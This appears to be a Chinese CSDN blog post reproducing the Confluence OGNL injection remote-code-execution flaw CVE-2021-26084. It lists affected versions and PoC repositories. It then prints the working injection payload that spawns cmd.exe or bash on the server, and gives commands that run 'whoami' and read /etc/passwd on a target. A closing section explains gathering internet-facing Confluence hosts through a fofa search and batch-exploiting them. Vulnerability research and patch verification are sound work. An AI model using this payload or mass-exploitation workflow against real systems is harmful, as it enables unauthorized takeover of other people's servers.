Confluence CVE-2021-26084远程代码执行漏洞复现

最新推荐文章于 2025-03-03 15:03:07 发布
最新推荐文章于 2025-03-03 15:03:07 发布
阅读量1.4w 收藏 9
点赞数 5
分类专栏: Web渗透测试 文章标签: html5
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39997829/article/details/120179000
版权
本文介绍了Confluence Server的严重OGNL注入漏洞CVE-2021-26084,该漏洞可能导致任意代码执行。受影响版本包括多个Confluence版本。文中提供了受影响和不受影响的版本列表,以及漏洞的POC和复现步骤。建议用户检查并升级到不受影响的版本以防止攻击。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、漏洞概述

近日,Atlassian官方发布了Confluence Server Webwork OGNL 注入漏洞(CVE-2021-26084)的安全公告,远程攻击者在经过身份验证或在特定环境下未经身份验证的情况下,可构造OGNL表达式进行注入,实现在 Confluence Server或Data Center上执行任意代码,CVSS评分为9.8。请相关用户尽快采取措施进行防护。

Atlassian Confluence是Atlassian公司出品的专业wiki程序。它可以作为一个知识管理的工具,通过它能够实现团队成员之间的协作和知识共享。

参考链接:https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html

二、影响范围

受影响版本

  • Confluence < 6.13.23
  • 6.14.0 ≤ Confluence < 7.4.11
  • 7.5.0 ≤ Confluence < 7.11.6
  • 7.12.0 ≤ Confluence < 7.12.5
  • Confluence < 7.13.0

不受影响版本

  • Confluence=6.13.23
  • Confluence=7.4.11
  • Confluence=7.11.6
  • Confluence=7.12.5
  • Confluence=7.13.0

三:漏洞POC

1、https://github.com/FanqXu/CVE-2021-26084

2、https://github.com/h3v0x/CVE-2021-26084_Confluence/

3、https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md

四:漏洞复现

我用的是https://github.com/FanqXu/CVE-2021-26084的poc进行验证的,将github的poc下载下来。

 关键POC部分如下所示:

 "queryString": "aaaaaaaa\\u0027+{Class.forName(\\u0027javax.script.ScriptEngineManager\\u0027).newInstance().getEngineByName(\\u0027JavaScript\\u0027).\\u0065val(\\u0027var isWin = java.lang.System.getProperty(\\u0022os.name\\u0022).toLowerCase().contains(\\u0022win\\u0022); var cmd = new java.lang.String(\\u0022" + command + "\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\\u0022cmd.exe\\u0022, \\u0022/c\\u0022, cmd); } else{p.command(\\u0022bash\\u0022, \\u0022-c\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\u0022\\u0022; var output = \\u0022\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\u0027)}+\\u0027"}

确认好你的python环境,使用pip安装如下库:

import requests
import sys
import os
import urllib3
import argparse
from bs4 import BeautifulSoup

import html5lib

 遇到安装BeautifulSoup库报错如下的话,记得指定源下载即可解决报错问题。

命令如下:

pip install bs4 -i https://pypi.douban.com/simple --trusted-host pypi.douban.com

环境准备就绪,即可运行脚本验证漏洞了。

首先验证是否存在漏洞,如下是漏洞已存在。

python PoC.py -u xxxx 

 

然后再执行命令,比如执行whomai试试。

python PoC.py -u xxxx -e whoami

 

执行cat /etc/passwd.

python PoC.py -u xxxx -e "cat /etc/passwd"

 五:fofa批量

关键字搜索app="ATLASSIAN-Confluence"

 然后使用fofa工具导出结果存到urls.txt,再使用https://github.com/FanqXu/CVE-2021-26084的poc进行批量验证即可。

使用的命令如下:

python PoC.py -f urls.txt

参考文章:

1、http://blog.nsfocus.net/atlassian-confluence/

2、https://github.com/FanqXu/CVE-2021-26084

3、https://github.com/h3v0x/CVE-2021-26084_Confluence/

Atlassian Confluence 远程代码执行漏洞复现CVE-2021-26084
0xSec
01-17 1653
Atlassian Confluence是Atlassian公司出品的专业wiki程序。它可以作为一个知识管理的工具,通过它能够实现团队成员之间的协作和知识共享。
Confluence漏洞学习——CVE-2021-26084/85CVE-2022-26134漏洞复现
记录并分享学习安全的知识点..
07-24 3149
​ Atlassian Confluence是Atlassian公司出品的专业wiki程序。它可以作为一个知识管理的工具,通过它能够实现团队成员之间的协作和知识共享。攻击者在经过身份验证或在特定环境下未经身份验证的情况下,可构造OGNL表达式进行注入,实现在 Confluence Server或Data Center上执行任意代码。 ​.........
CVE-2021-26084confluence
sinat_42420072的博客
01-26 1887
Confluence Server、Confluence Data Center等产品存在OGNL 注入漏洞,允许经过身份验证的用户(在某些情况下的未经身份验证的用户)在 Confluence Server或Confluence Data Center实例上执行任意代码。
CVE-2021-26085 confluence 配置文件泄露漏洞
最新发布
PJzhangSec的博客
03-03 397
http://***.***.***.***:9090 [200] [主页面 - PBconfluence] [Atlassian Confluence,Confluence,Java,fisheye] [2737] [FileFuzz: "GoPOC_confluence|CVE_2021_26085","poc-yaml-confluence-cve-2021-26085-arbitrary-file-read","NucleiPOC_CVE-2021-26085"]这里有5条POC测试路径。
CVE-2021-26084
weixin_51387754的博客
09-23 2391
Confluence Server 和 Data Center 的受影响版本中,存在 OGNL 注入漏洞,允许未经身份验证的攻击者在 Confluence Server 或数据中心实例上执行任意代码。受影响的版本分别为 6.13.23 之前的版本、7.4.11 之前的 6.14.0 版本、7.11.6 之前的 7.5.0 版本和 7.12.5 之前的 7.12.0 版本。 #!/usr/bin/env python3 # -*- encoding: utf-8 -*- """ @File :
Confluence 修复 CVE-2021-26084 OGNL注入漏洞
weixin_56306210的博客
06-21 1716
Confluence 修复 CVE-2021-26084 OGNL注入漏洞
Atlassian Confluence OGNL表达式注入命令执行漏洞CVE-2021-26084漏洞复现
m0_64366018的博客
01-16 781
Confluence Data Center上存在一个注入漏洞漏洞编号为CVE-2021-26084。该漏洞允许经过身份验证或在某些情况下未授权的攻击者,在Confluence Server或Confluence Data Center上执行任意代码。
CVE-2021-26084 漏洞分析
why811的博客
10-17 344
userdirective:自定义函数路径。
漏洞复现】Atlassian Confluence(CVE-2022-26134)OGNL远程代码执行
李火火的安全圈
06-06 2373
本篇文章所涉及技术与工具仅用于技术研究、漏洞复现,切勿用于非法渗透攻击行为,造成任何后果与本作者无关,切记!!!Atlassian Confluence 是一款各企业广泛使用的 wiki 系统。在上存在OGNL 注入漏洞,恶意攻击者可以利用该漏洞在目标Atlassian Confluence Server and Data Center服务器上注入恶意ONGL表达式 ,造成远程代码执行。......
S2-062 远程命令执行漏洞复现(cve-2021-31805)
box
04-19 7717
S2-062 远程命令执行(cve-2021-31805) 0x00 漏洞描述 该漏洞由于对CVE-2020-17530的修复不完整造成的,CVE-2020-17530漏洞是由于Struts2 会对某些标签属性(比如id) 的属性值进行二次表达式解析,因此当这些标签属性中使用了 %{x} 且 其中x 的值用户可控时,用户再传入一个 %{payload} 即可造成OGNL表达式执行。在CVE-2021-31805漏洞中,仍然存在部分标签属性会造成攻击者恶意构造的OGNL表达式执行,导致远程代码执行。 0x01
CVE-2021-26084——Confluence OGNL 注入漏洞分析
战神/calmness的博客
09-04 2387
简述 2021年08月26日,Atlassian官方发布了Confluence OGNL 注入漏洞的风险通告,漏洞编号为CVE-2021-26084漏洞等级:严重,漏洞评分:8.8。目前该漏洞安全补丁已更新。 Confluence是Atlassian公司的一个专业的企业知识管理与协同软件,也可以用于构建企业wiki,因此,Confluence的使用面很广。在某些情况下,未授权的攻击者可以构造特殊的请求,造成远程代码执行。 影响版本 组件
CVE-2021-26084confluence)(2),2024网络安全岗面试题知识点小结
m0_60666841的博客
04-05 908
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
CVE-2021-26084confluence),凭借这份网络安全面试题集
m0_60666841的博客
04-05 853
命令:cp atlassian-extras-decoder-v2-3.4.1.jar /home/ubontu/atlassian/confluence/confluence/WEB-INF/lib/atlassian-extras-decoder-v2-3.4.1.jar。从服务器上拷贝出文件 /home/ubontu/atlassian/confluence/confluence/WEB-INF/lib/atlassian-extras-decoder-v2-3.4.1.jar (路径同上查找)
CVE-2021-26084confluence)(1),疯狂涨知识
m0_60666841的博客
04-05 1058
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
CVE-2021-26084 goby exp
不光要学,知识要能说出口
10-29 437
CVE-2021-26084 goby exp声明代码 声明 本程序仅供于学习交流,请使用者遵守《中华人民共和国网络安全法》,勿将此脚本用于非授权的测试,脚本开发者不负任何连带法律责任。 代码 { "Name": "Confluence RCE(CVE-2021-26084)", "Level": "3", "Tags": [ "RCE" ], "GobyQuery": "product=\"Confluence\"",
CVE-2024-26084confluence
2401_86437117的博客
09-05 1323
Confluence Server、Confluence Data Center等产品存在OGNL 注入漏洞,允许经过身份验证的用户(在某些情况下的未经身份验证的用户)在 Confluence Server或Confluence Data Center实例上执行任意代码。
Atlassian Confluence CVE-2022-26134 RCE漏洞
4SecNet团队专栏
04-22 1273
漏洞环境搭建前期主要搭建动态调试环境,但是一直失败(这里主要记录下动态调试环境搭建过程,待之后再碰到类似的问题,希望能够解决)通常称为服务端小程序,是服务端的程序,用于处理及响应客户的请求。之后即可直接调试(这次是成功了的,可以正常动态调试,反思和之前不一样的操作就是在弹出。直接对比补丁包的修改,入手点参考网上已有的分析报告.主要参考链接在文末给出.填入密钥,因为我这里已经注册过了,所以直接填入密钥,没注册过,可以点击。的环境基本上已经搭建完毕了,接下来进行网站设置,我选择的是。(直接进行动态调试)
通报:Confluence远程代码执行漏洞CVE-2021-26084)被黑产大规模利用
qcloud_security的博客
09-06 1877
8月26日,Atlassian官方发布公告,披露了一个Atlassian Confluence 远程代码执行漏洞CVE-2021-26084),攻击者利用漏洞可完全控制服务器。8月31日晚,腾讯云原生安全漏洞检测响应平台通过主机安全(云镜)检测到首个利用该漏洞的在野攻击案例。 腾讯安全旗下全系列企业级产品均已支持检测防御利用Atlassian Confluence远程代码执行漏洞的攻击活动。 腾讯云上安全产品全栈提供针对Confluence远程代码执行漏洞的检测防护能力,政企用户运维人员.
Confluence 未授权漏洞分析(CVE-2023-22515
2301_80115097的博客
11-28 377
在处理完上述工作后,Struts2 就会调用拦截器链中的拦截器,这些拦截器会根据用户请求参数值去更新 ValueStack 对象顶层节点的相应属性的值,最后会传到 Action 对象,并将 ValueStack 对象中的属性值,赋给 Action 类的相应属性。总的来说, 因为 方法的一些逻辑问题, 导致这个类自身对传入参数的过滤并没有生效, 我们最终还是可以通过 的形式去调用当前 action 的 getter / setter, 并不需要关心方法本身或者它的 returnType 是否使用了 注解。
Confluence漏洞
07-28
Confluence漏洞是指在Confluence Server或Data Center的特定版本中存在的安全漏洞,攻击者可以通过构造恶意数据执行OGNL表达式进行注入攻击,最终控制服务器。\[1\]受影响的版本包括Confluence Server & Confluence Data Center < 6.13.23、6.13.23 < Confluence Server & Confluence Data Center < 7.11.6、7.11.6 < Confluence Server & Confluence Data Center < 7.12.5、7.12.5 < Confluence Server & Confluence Data Center < 7.4.11。\[1\]具体的漏洞复现和影响范围可以参考Atlassian官方的安全公告链接:https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215。\[3\] #### 引用[.reference_title] - *1* [confluence的几个高危漏洞复现](https://blog.csdn.net/xiayu729100940/article/details/128197797)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [Confluence CVE-2021-26084远程代码执行漏洞复现](https://blog.csdn.net/weixin_39997829/article/details/120179000)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值